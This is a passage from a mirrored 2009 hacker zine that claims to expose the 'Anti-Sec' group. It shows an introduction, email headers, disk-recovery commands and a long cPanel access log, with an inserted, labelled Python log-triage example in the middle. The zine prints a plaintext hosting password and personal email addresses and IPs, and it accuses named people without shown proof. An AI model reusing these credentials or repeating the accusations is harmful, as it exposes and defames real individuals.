mirror of https://github.com/fdiskyou/Zines.git
antisec *no more*
get yours http://www.network-science.de/ascii/


[0x00] [Introduction]
[0x01] [Forensics]
[0x02] [Target Profiling & Lulz]
[0x03] [ownage.net - prosec]
[0x04] [vitalspeeds - prosec]
[0x05] [makosolutions - prosec]
[0x06] [holeinthewallhosting - prosec]
[0x07] [darkmindz - zf05]
[0x08] [Backdoor RCE]
[0x09] [SEO Optimizing]
[0x10] [Reporting]
[0x11] [Attachments]
[0x12] [Conclusion]
[0x13] [Greetz]

[0x00] [Introduction] hai:]

What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known
as "ProSec" contacted us with reports containing information about the entire group and how it was operating.
We don't know who they are; they appear to be well-funded, top-notch security experts, and what
they have done against the group is invaluable to us and to others who have been or would have been targeted.
ProSec did want me to convey a message: organizations similar to Anti-Sec will be, and currently are being,
targeted by the movement. ProSec already has access to a number of them and is continuously monitoring and gathering
more information about the various groups, and will release information when applicable. No longer should whitehats
fear these groups; as soon as an individual is targeted, they will target right back. This is a warning shot to
those out there who target us. I want to thank ProSec for the work that they continue to do, and I understand why this
movement is so important to the security community.

On the 4th of June 2009, a group named "Anti-Sec" decided to expose the Astalavista group after
they successfully exploited what was rumored to be a Litespeed 0day exploit, which in reality does not exist.
After looking into this more and more, a couple of days later we found out that the person
responsible for this attack was a Saudi Arabian with the nickname RoMeO, so we decided to let the other
Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators,
decided to warn his friend RoMeO about it and, as you will notice below, Joao Pontes (rorkty) knew
from the beginning that the Astalavista group was compromised by his closest friend and decided to do nothing about it.
Later, on the 9th of June, one of my dedicated hosting servers, running a couple of websites, was targeted
by the same "Anti-Sec" group, providing fake and misleading information to the public.

The reason that we decided to start looking into this subject was to see how and why my dedicated hosting
server was compromised despite the fact that it was secure enough to provide access to the outside world.

Below is a list of some security measures that had been taken to ensure no unauthorized access was permitted:

1) Firewall Protection
2) Brute Force Detection and Prevention
3) Kernel Hardening
4) Apache, PHP, SQL Hardening
5) SSH Hardening
6) Wheel access group for su
7) Chrooted Jail Shell
8) Web Application Firewall
9) Network Intrusion Detection
10) Host Intrusion Detection
11) Hidden daemon versions
12) Rootkit Detection
13) DoS Protection
14) All private sites hosted, audited for bugs
15) Root Access Alert
16) Etc

Unfortunately, the interval between the compromise of the server and the alert reports coming to our attention
was not enough to prevent the attack.

After our research and the information provided by the ProSec group, we came to the conclusion that the server was
either hit by a 0day exploit or compromised through my dedicated server provider makosolutions.com, which, as shown
later on, was backdoored.

Utilizing passive and active reconnaissance methods resulted in large information acquisitions, which provided
us with the means to link together certain information and shed more light on whom we are about to target and
research for the attacks that took place under the "Anti-Sec" label.

In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities.

[0x01] [Forensics]

Email Incidents

Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs268734fao;
        Tue, 9 Jun 2009 03:58:03 -0700 (PDT)
Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200;
        Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Return-Path: <root@freehostia.com>
Received: from freehostia.com ([66.40.52.21])
        by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02;
        Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21;
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com
Received: from root by freehostia.com with local (Exim 4.63)
        (envelope-from <root@freehostia.com>)
        id 1MDz3p-0002ME-UX
        for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000
To: glafkos@gmail.com
Subject: Hosting account: Password reminder
MIME-Version: 1.0
Content-type: text/plain; charset=UTF-8
From: Free Hostia <csupport@freehostia.com>
Cc:
Reply-To:
Message-Id: <E1MDz3p-0002ME-UX@freehostia.com>
Date: Tue, 09 Jun 2009 11:00:09 +0000

Dear Glask Chwat,

at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel.

We are sending you your account login details:
username: glachw
password: 1779586

If you have any questions, please open a new support ticket from the Help section of the Control Panel.

Best Regards,
Free Hostia Team


/*
Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor?
As you can see above, he made this request from his home IP.
*/


Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs272895fao;
        Tue, 9 Jun 2009 05:26:34 -0700 (PDT)
MIME-Version: 1.0
Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue,
        09 Jun 2009 05:26:34 -0700 (PDT)
Date: Tue, 9 Jun 2009 15:26:34 +0300
Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com>
Subject: Lol.
From: james knuth <james.knuth1@gmail.com>
To: glafkos@gmail.com
Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868


http://pastebin.com/m592e1f1c

It will be all over the net soon,

Enjoy.


// Indeed..

Server Forensics

root@srv01 [/home/recovery]# du -h --max-depth=1
608K ./APF_Backup
992K ./Diff
224K ./Latest
3.3M ./LinkNet
46M ./log
1.2M ./modbin
7.5G ./sdb2recover
361M ./sdb3recover
371M ./sdb5recover
121M ./Software
128K ./OpenSSH_Debug
4.5G ./Evidence
15G .
root@srv01 [/home/recovery]#

// Obviously this noobcake didn't know that it was possible to recover deleted files


root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string*
416K sdb2output.txt
7.5G sdb2recover
361M sdb3recover
7.9M sdb3usrdirlist.txt
371M sdb5recover
22M sdb5tmp.txt
64K sdb8deleted_files.txt
2.5M sdb8home.txt
857M stringfile_sdb2.txt
root@srv01 [/home/recovery]#

root@srv01 [/home/recovery]# ls -lad sd*recover
drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover
drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover
drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover
root@srv01 [/home/recovery]#


root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt
root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt
r/r 2195490: local/cpanel/logs/access_log
r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync
r/r 2362208: local/apache/logs/access_log
root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log
root@srv01 [/home/recovery]# ls -la /tmp/access_log
-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log
root@srv01 [/home/recovery]#

// Someone needs to learn how to cover his tracks... try... "man dd"

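Added example, not part of the original zine: one way to triage a recovered cPanel access_log of the kind grepped below, in Python. It copes with entries that carry no status code (as the authenticated root requests in this log do) and reports addresses that were refused with 401 before an authenticated session appeared; the sample lines, IPs, host name and function names are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed sample in the layout of the recovered log (documentation IPs,
# made-up host cp.example.test); the last line simulates recovery damage.
SAMPLE_LOG = """\
203.0.113.7 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "UA/1.0"
203.0.113.7 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://cp.example.test:2096/" "UA/1.0"
203.0.113.7 - user@example.test [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://cp.example.test:2096/" "UA/1.0"
203.0.113.7 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "UA/1.0"
203.0.113.7 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://cp.example.test:2087/" "UA/1.0"
203.0.113.7 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://cp.example.test:2087/" "UA/1.0"
203.0.113.7 - root [06/08/2009:13:19:46 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://cp.example.test:2087/scripts/command" "UA/1.0"
198.51.100.20 - root [06/08/2009:09:00:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://cp.example.test:2087/scripts/command" "UA/2.0"
this line is damaged and must be skipped
"""

# The status code is optional: some authenticated entries log only one number.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?:(?P<status>\d{3}) )?(?P<size>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Login-page assets and versioned theme files say nothing about operator intent.
STATIC_RE = re.compile(
    r'^/(?:unprotected|cPanel_magic_revision_\d+)/|\.(?:css|js|gif|jpg|png|ico)$'
)


def parse_line(line):
    """Return a dict for one log entry, or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    try:
        # Assumption: the date is month/day/year, as the June 2009 timeline implies.
        rec["ts"] = datetime.strptime(rec["ts"], "%m/%d/%Y:%H:%M:%S %z")
        # The Referer carries the service port the client was talking to.
        rec["port"] = urlsplit(rec["referer"]).port if rec["referer"] else None
    except ValueError:
        return None
    rec["status"] = int(rec["status"]) if rec["status"] else None
    return rec


def summarize(lines):
    """Build a per-IP view of refusals and authenticated sessions."""
    records, skipped = [], 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            skipped += 1
        else:
            records.append(rec)

    report = defaultdict(lambda: {"denied": 0, "failed_users": set(), "sessions": {}})
    # Recovered fragments may be out of order, so sort by timestamp first.
    for rec in sorted(records, key=lambda r: r["ts"]):
        entry = report[rec["ip"]]
        if rec["status"] == 401:
            entry["denied"] += 1
            if rec["user"] != "-":
                entry["failed_users"].add(rec["user"])
            continue
        if rec["user"] == "-":
            continue
        session = entry["sessions"].setdefault(rec["user"], {
            "first_seen": rec["ts"],
            "port": rec["port"],
            "denied_before": entry["denied"],
            "actions": [],
        })
        if not STATIC_RE.search(rec["path"]):
            session["actions"].append(rec["path"])
    return dict(report), skipped


def suspicious(report):
    """(ip, user) pairs where the address was refused before it authenticated."""
    return sorted(
        (ip, user)
        for ip, entry in report.items()
        for user, session in entry["sessions"].items()
        if session["denied_before"] > 0
    )


if __name__ == "__main__":
    report, skipped = summarize(SAMPLE_LOG.splitlines())
    print("unparsed lines:", skipped)
    for ip, user in suspicious(report):
        s = report[ip]["sessions"][user]
        print(ip, user, s["first_seen"].isoformat(), "port", s["port"],
              "after", s["denied_before"], "refusals:", s["actions"])
```
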
root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54
188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
